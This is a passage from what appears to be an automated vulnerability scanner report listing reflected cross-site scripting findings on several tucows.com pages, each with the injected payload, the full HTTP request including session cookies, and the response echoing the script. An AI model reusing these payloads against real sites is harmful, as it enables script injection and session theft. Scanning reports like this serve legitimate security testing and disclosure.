Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/privacy.htmla3ab0"-alert(1)-"6b16cc9a4b3";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.382. http://www.tucows.com/privacy.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /privacy.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e4b0"-alert(1)-"dc8c1805ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacy.html?2e4b0"-alert(1)-"dc8c1805ae=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 36886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/privacy.html?2e4b0"-alert(1)-"dc8c1805ae=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.383. http://www.tucows.com/sitemap.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /sitemap.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9edf7"-alert(1)-"26f2d744f54 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitemap.html9edf7"-alert(1)-"26f2d744f54 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:33:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/sitemap.html9edf7"-alert(1)-"26f2d744f54";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.384. http://www.tucows.com/sitemap.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /sitemap.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95630"-alert(1)-"ad45798eea4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitemap.html?95630"-alert(1)-"ad45798eea4=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:31:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 284587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/sitemap.html?95630"-alert(1)-"ad45798eea4=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.385. http://www.tucows.com/software.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /software.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6930b"-alert(1)-"88848db90c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /software.html6930b"-alert(1)-"88848db90c4 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/software.html6930b"-alert(1)-"88848db90c4";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.386. http://www.tucows.com/software.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /software.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89730"-alert(1)-"ede5d633695 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /software.html?89730"-alert(1)-"ede5d633695=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:49 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 49601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download Windows Fre
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 2;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/software.html?89730"-alert(1)-"ede5d633695=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.387. http://www.tucows.com/software.html [pf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /software.html

Issue detail

The value of the pf request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36557"-alert(1)-"b121e4a791 was submitted in the pf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /software.html?t=689&pf=win36557"-alert(1)-"b121e4a791 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:00 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 55803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download Windows Fre
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 2;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/software.html?t=689&pf=win36557"-alert(1)-"b121e4a791";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.388. http://www.tucows.com/software.html [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /software.html

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d91d8"-alert(1)-"32c743300b4 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /software.html?t=689d91d8"-alert(1)-"32c743300b4&pf=win HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVDWt9eDsgAvDivKt0Eex6B0RPBHeE1vxYfjLZMpBZlW7bjlV79Z3QWdkzy6r7qpr%2BTJUX7x9ThxdXpMo6KMFZWyrMA2IUCivRn8fEr2dY2En; path=/
Connection: close
Content-Type: text/html
Content-Length: 55720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download Windows Fre
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 2;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/software.html?t=689d91d8"-alert(1)-"32c743300b4&pf=win";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.389. http://www.tucows.com/terms.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /terms.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc4ae"-alert(1)-"f753e1f604a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /terms.htmlfc4ae"-alert(1)-"f753e1f604a HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/terms.htmlfc4ae"-alert(1)-"f753e1f604a";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.390. http://www.tucows.com/terms.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /terms.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ed39"-alert(1)-"d3cf4b9dbed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /terms.html?2ed39"-alert(1)-"d3cf4b9dbed=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 38731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/terms.html?2ed39"-alert(1)-"d3cf4b9dbed=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.391. http://www.tucows.com/videoegg/ad.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /videoegg/ad.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 436cb"-alert(1)-"c0ec75e5035 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /videoegg436cb"-alert(1)-"c0ec75e5035/ad.html HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www8.tucows.com/delivery/afr.php?zoneid=187&cb=6253c4ae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmc=163973946; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utmb=163973946; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/videoegg436cb"-alert(1)-"c0ec75e5035/ad.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.392. http://www.tucows.com/videoegg/ad.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /videoegg/ad.html

Issue detail

